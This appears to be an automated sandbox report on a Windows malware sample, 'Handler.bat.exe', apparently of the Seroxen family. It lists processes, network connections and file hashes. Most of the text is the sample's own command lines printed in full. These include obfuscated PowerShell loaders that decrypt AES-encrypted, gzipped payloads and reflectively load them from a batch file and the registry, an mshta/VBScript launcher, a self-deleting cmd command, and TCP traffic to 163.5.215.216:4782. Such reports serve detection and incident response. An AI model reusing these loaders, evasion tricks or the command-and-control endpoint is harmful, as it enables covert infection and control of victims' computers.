"Handler.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function AsZVG($IObBH){ $nGKhQ=[System.Security.Cryptography.Aes]::Create(); $nGKhQ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nGKhQ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nGKhQ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z1mnkXiSZPv8R2MpZKBD3X42qpFHtc3mYWmVqJ/jqFk='); $nGKhQ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oe8taAs+mjon3dfZMtxPIg=='); $IIMfj=$nGKhQ.CreateDecryptor(); $return_var=$IIMfj.TransformFinalBlock($IObBH, 0, $IObBH.Length); $IIMfj.Dispose(); $nGKhQ.Dispose(); $return_var;}function nroxc($IObBH){ $lXPBt=New-Object System.IO.MemoryStream(,$IObBH); $jzRog=New-Object System.IO.MemoryStream; $raowK=New-Object System.IO.Compression.GZipStream($lXPBt, [IO.Compression.CompressionMode]::Decompress); $raowK.CopyTo($jzRog); $raowK.Dispose(); $lXPBt.Dispose(); $jzRog.Dispose(); $jzRog.ToArray();}function Dtllp($IObBH,$RqHgm){ $OepAU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$IObBH); $TRlDt=$OepAU.EntryPoint; $TRlDt.Invoke($null, $RqHgm);}$pyjrp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat').Split([Environment]::NewLine);foreach ($FdSgb in $pyjrp) { if ($FdSgb.StartsWith('SEROXEN')) { $AdNpy=$FdSgb.Substring(7); break; }}$tMmhK=[string[]]$AdNpy.Split('\');$vypGp=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[0])));$asijd=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[1])));Dtllp $asijd (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));Dtllp $vypGp (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{6c1e8ae1-059a-4079-9d9a-8b3ac6a37e20}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{dde15a65-4832-4c21-b873-b8380cde8204}
C:\Windows\$sxr-mshta.exe
C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
C:\Windows\$sxr-cmd.exe
"C:\Windows\$sxr-cmd.exe" /c %$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\$sxr-powershell.exe
C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function sXCMM($CkDpq){ $zljWq=[System.Security.Cryptography.Aes]::Create(); $zljWq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zljWq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zljWq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0='); $zljWq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg=='); $QOVuV=$zljWq.('rotpyrceDetaerC'[-1..-15] -join '')(); $XqeJd=$QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CkDpq, 0, $CkDpq.Length); $QOVuV.Dispose(); $zljWq.Dispose(); $XqeJd;}function pIPqe($CkDpq){ $RVxvX=New-Object System.IO.MemoryStream(,$CkDpq); $MPpXr=New-Object System.IO.MemoryStream; $tIDwQ=New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::Decompress); $tIDwQ.CopyTo($MPpXr); $tIDwQ.Dispose(); $RVxvX.Dispose(); $MPpXr.Dispose(); $MPpXr.ToArray();}function OVJQF($CkDpq,$HUtBG){ $QhIbf=[System.Reflection.Assembly]::Load([byte[]]$CkDpq); $edhhl=$QhIbf.EntryPoint; $edhhl.Invoke($null, $HUtBG);}$zljWq1 = New-Object System.Security.Cryptography.AesManaged;$zljWq1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$dKTJk = $zljWq1.('rotpyrceDetaerC'[-1..-15] -join '')();$RVcQq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nh0O9Tq4WhjVRVv6TIlxng==');$RVcQq = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq, 0, $RVcQq.Length);$RVcQq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq);$OATYX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DphlnsvScNekfgsLVTd7mzDTpuPYV2uzlVKF5APiXTs=');$OATYX = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OATYX, 0, $OATYX.Length);$OATYX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OATYX);$pxqaL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VOurjNNOAf3rWCyDVTfXEg==');$pxqaL = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pxqaL, 0, $pxqaL.Length);$pxqaL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pxqaL);$sZmZm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bwCwxwfgvgLvd83CID2tuY2PW5n2F6O9HvfP0OXG8B2If0HCFuJvOfQkZnJJHGqr4W77keqJnrHoUOLsxavQfVPJgnZi5dCVwfqInTPzI5sB/ovu8wzR06kYDbDCFSZIUmhZnetqX07nQ3nN2G8dx8hDcvN8OEtke141bP5XbYA7V7pEdDf3FgqTYuWoMaz+k56vPVibKCooeH7zQ3DK29EBBQ9NAhbbXDFzReMv7zlMDbkoqlsAAEqbrXnoCu5yb4MKtcf+DHcvr/3wdC9bIKzrVR+Z59S5tuu5Ot2efgPcTwmjF9AfsSO6Z0XGodft9zU2RXKHKxayYhES9v/HDue0kdAd1egn28t4LVgg/sk/Lq23+HYJ+gLzHX2a8njudWREXxqxpxGUV/yJzhNVaEtLryDlFlbG61xiz9rtJRc=');$sZmZm = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sZmZm, 0, $sZmZm.Length);$sZmZm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sZmZm);$hunvf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rq5zXkyy0NL/id4X1CFNpQ==');$hunvf = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hunvf, 0, $hunvf.Length);$hunvf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hunvf);$uooKb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wR0HI5liF2OH5JSIeYrcUA==');$uooKb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uooKb, 0, $uooKb.Length);$uooKb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uooKb);$HssPO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wr1hAjwP3vd25eg2X2PyLA==');$HssPO = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HssPO, 0, $HssPO.Length);$HssPO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HssPO);$coosp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W+228sMz/VVvzW5Wi2DfeQ==');$coosp = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($coosp, 0, $coosp.Length);$coosp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($coosp);$cqFrb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LnPkErAMqZ8UA2dOM3NRUw==');$cqFrb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cqFrb, 0, $cqFrb.Length);$cqFrb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cqFrb);$RVcQq0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jzKuA/Szphx4DaASO5/17A==');$RVcQq0 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq0, 0, $RVcQq0.Length);$RVcQq0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq0);$RVcQq1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KBGLdnELndsDRqQwc9+ZdQ==');$RVcQq1 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq1, 0, $RVcQq1.Length);$RVcQq1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq1);$RVcQq2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h0utQU1KufGAbeZac8uGpg==');$RVcQq2 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq2, 0, $RVcQq2.Length);$RVcQq2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq2);$RVcQq3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NHOzA0blhk4FfOP1QwdrHA==');$RVcQq3 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq3, 0, $RVcQq3.Length);$RVcQq3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq3);$dKTJk.Dispose();$zljWq1.Dispose();if (@(get-process -ea silentlycontinue $RVcQq3).count -gt 1) {exit};$wqkcL = [Microsoft.Win32.Registry]::$coosp.$HssPO($RVcQq).$uooKb($OATYX);$khgFI=[string[]]$wqkcL.Split('\');$IeVcP=pIPqe(sXCMM([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[1])));OVJQF $IeVcP (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$dgCqa = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[0]);$zljWq = New-Object System.Security.Cryptography.AesManaged;$zljWq.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$QOVuV = $zljWq.('rotpyrceDetaerC'[-1..-15] -join '')();$dgCqa = $QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dgCqa, 0, $dgCqa.Length);$QOVuV.Dispose();$zljWq.Dispose();$RVxvX = New-Object System.IO.MemoryStream(, $dgCqa);$MPpXr = New-Object System.IO.MemoryStream;$tIDwQ = New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::$RVcQq1);$tIDwQ.$cqFrb($MPpXr);$tIDwQ.Dispose();$RVxvX.Dispose();$MPpXr.Dispose();$dgCqa = $MPpXr.ToArray();$tbTTb = $sZmZm | IEX;$QhIbf = $tbTTb::$RVcQq2($dgCqa);$edhhl = $QhIbf.EntryPoint;$edhhl.$RVcQq0($null, (, [string[]] ($pxqaL)))
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{af284ebf-c17d-416a-89fe-4d4c69dab533}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{e6d23945-1aac-40fc-8343-6399bdcfaaef}
C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3168).WaitForExit();[System.Threading.Thread]::Sleep(5000); function sXCMM($CkDpq){ $zljWq=[System.Security.Cryptography.Aes]::Create(); $zljWq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zljWq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zljWq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0='); $zljWq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg=='); $QOVuV=$zljWq.('rotpyrceDetaerC'[-1..-15] -join '')(); $XqeJd=$QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CkDpq, 0, $CkDpq.Length); $QOVuV.Dispose(); $zljWq.Dispose(); $XqeJd;}function pIPqe($CkDpq){ $RVxvX=New-Object System.IO.MemoryStream(,$CkDpq); $MPpXr=New-Object System.IO.MemoryStream; $tIDwQ=New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::Decompress); $tIDwQ.CopyTo($MPpXr); $tIDwQ.Dispose(); $RVxvX.Dispose(); $MPpXr.Dispose(); $MPpXr.ToArray();}function OVJQF($CkDpq,$HUtBG){ $QhIbf=[System.Reflection.Assembly]::Load([byte[]]$CkDpq); $edhhl=$QhIbf.EntryPoint; $edhhl.Invoke($null, $HUtBG);}$zljWq1 = New-Object System.Security.Cryptography.AesManaged;$zljWq1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$dKTJk = $zljWq1.('rotpyrceDetaerC'[-1..-15] -join '')();$RVcQq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nh0O9Tq4WhjVRVv6TIlxng==');$RVcQq = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq, 0, $RVcQq.Length);$RVcQq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq);$OATYX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DphlnsvScNekfgsLVTd7mzDTpuPYV2uzlVKF5APiXTs=');$OATYX = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OATYX, 0, $OATYX.Length);$OATYX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OATYX);$pxqaL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VOurjNNOAf3rWCyDVTfXEg==');$pxqaL = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pxqaL, 0, $pxqaL.Length);$pxqaL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pxqaL);$sZmZm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bwCwxwfgvgLvd83CID2tuY2PW5n2F6O9HvfP0OXG8B2If0HCFuJvOfQkZnJJHGqr4W77keqJnrHoUOLsxavQfVPJgnZi5dCVwfqInTPzI5sB/ovu8wzR06kYDbDCFSZIUmhZnetqX07nQ3nN2G8dx8hDcvN8OEtke141bP5XbYA7V7pEdDf3FgqTYuWoMaz+k56vPVibKCooeH7zQ3DK29EBBQ9NAhbbXDFzReMv7zlMDbkoqlsAAEqbrXnoCu5yb4MKtcf+DHcvr/3wdC9bIKzrVR+Z59S5tuu5Ot2efgPcTwmjF9AfsSO6Z0XGodft9zU2RXKHKxayYhES9v/HDue0kdAd1egn28t4LVgg/sk/Lq23+HYJ+gLzHX2a8njudWREXxqxpxGUV/yJzhNVaEtLryDlFlbG61xiz9rtJRc=');$sZmZm = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sZmZm, 0, $sZmZm.Length);$sZmZm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sZmZm);$hunvf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rq5zXkyy0NL/id4X1CFNpQ==');$hunvf = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hunvf, 0, $hunvf.Length);$hunvf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hunvf);$uooKb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wR0HI5liF2OH5JSIeYrcUA==');$uooKb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uooKb, 0, $uooKb.Length);$uooKb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uooKb);$HssPO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wr1hAjwP3vd25eg2X2PyLA==');$HssPO = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HssPO, 0, $HssPO.Length);$HssPO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HssPO);$coosp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W+228sMz/VVvzW5Wi2DfeQ==');$coosp = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($coosp, 0, $coosp.Length);$coosp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($coosp);$cqFrb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LnPkErAMqZ8UA2dOM3NRUw==');$cqFrb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cqFrb, 0, $cqFrb.Length);$cqFrb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cqFrb);$RVcQq0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jzKuA/Szphx4DaASO5/17A==');$RVcQq0 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq0, 0, $RVcQq0.Length);$RVcQq0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq0);$RVcQq1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KBGLdnELndsDRqQwc9+ZdQ==');$RVcQq1 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq1, 0, $RVcQq1.Length);$RVcQq1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq1);$RVcQq2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h0utQU1KufGAbeZac8uGpg==');$RVcQq2 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq2, 0, $RVcQq2.Length);$RVcQq2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq2);$RVcQq3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NHOzA0blhk4FfOP1QwdrHA==');$RVcQq3 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq3, 0, $RVcQq3.Length);$RVcQq3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq3);$dKTJk.Dispose();$zljWq1.Dispose();if (@(get-process -ea silentlycontinue $RVcQq3).count -gt 1) {exit};$wqkcL = [Microsoft.Win32.Registry]::$coosp.$HssPO($RVcQq).$uooKb($OATYX);$khgFI=[string[]]$wqkcL.Split('\');$IeVcP=pIPqe(sXCMM([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[1])));OVJQF $IeVcP (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$dgCqa = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[0]);$zljWq = New-Object System.Security.Cryptography.AesManaged;$zljWq.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$QOVuV = $zljWq.('rotpyrceDetaerC'[-1..-15] -join '')();$dgCqa = $QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dgCqa, 0, $dgCqa.Length);$QOVuV.Dispose();$zljWq.Dispose();$RVxvX = New-Object System.IO.MemoryStream(, $dgCqa);$MPpXr = New-Object System.IO.MemoryStream;$tIDwQ = New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::$RVcQq1);$tIDwQ.$cqFrb($MPpXr);$tIDwQ.Dispose();$RVxvX.Dispose();$MPpXr.Dispose();$dgCqa = $MPpXr.ToArray();$tbTTb = $sZmZm | IEX;$QhIbf = $tbTTb::$RVcQq2($dgCqa);$edhhl = $QhIbf.EntryPoint;$edhhl.$RVcQq0($null, (, [string[]] ($pxqaL)))
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{95d8d05e-daed-48bd-acd6-088194a59e27}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{2badb970-0ee3-4b27-a94d-a01e540c4995}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{f076ceda-59a0-4b89-b6f7-0bb03581a885}
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{5d4c1b37-9138-4495-8ae4-d154870b7857}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{68c18e95-fca2-44cf-bdc9-7416bb512836}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{52e53863-69fb-41a0-9e96-acb5f7e0af93}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{329780d6-c194-4c0a-80de-24e0e2477612}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{e3a5a8f2-ba1f-442f-a027-b0df8d9017e5}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{41c108b2-7ae1-4ca1-b47b-dca1fcf112fc}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{2b6b2dc1-4e67-4c1e-b3ca-4565b2a132b3}
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 460 -p 5820 -ip 5820
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5820 -s 308
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{9708dcbf-e875-44b8-a5d4-03771b9fcda6}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{675e7367-5393-4afc-a47e-fcf042d536e1}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{f2b2f4c5-7a98-48e6-8b8b-acd2b7293109}
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 376 -ip 376
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 376 -s 456
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{eb4d027d-449b-452c-913f-affa67d6daef}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{1519bb58-08e6-4e31-8d8b-b982de74ff3b}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{bc2940b0-c17f-4b9b-a5e6-e8e658f8fdea}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{a5590f11-ab6f-40ee-977a-240faad25fba}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\PING.EXE
PING localhost -n 8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| FR | 163.5.215.216:4782 | tcp | |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| FR | 163.5.215.216:4782 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
| MD5 | 04029e121a0cfa5991749937dd22a1d9 |
| SHA1 | f43d9bb316e30ae1a3494ac5b0624f6bea1bf054 |
| SHA256 | 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f |
| SHA512 | 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b |
memory/4528-4-0x00007FF81F973000-0x00007FF81F975000-memory.dmp
memory/4528-5-0x0000020124120000-0x0000020124142000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5ewlbilj.dmq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
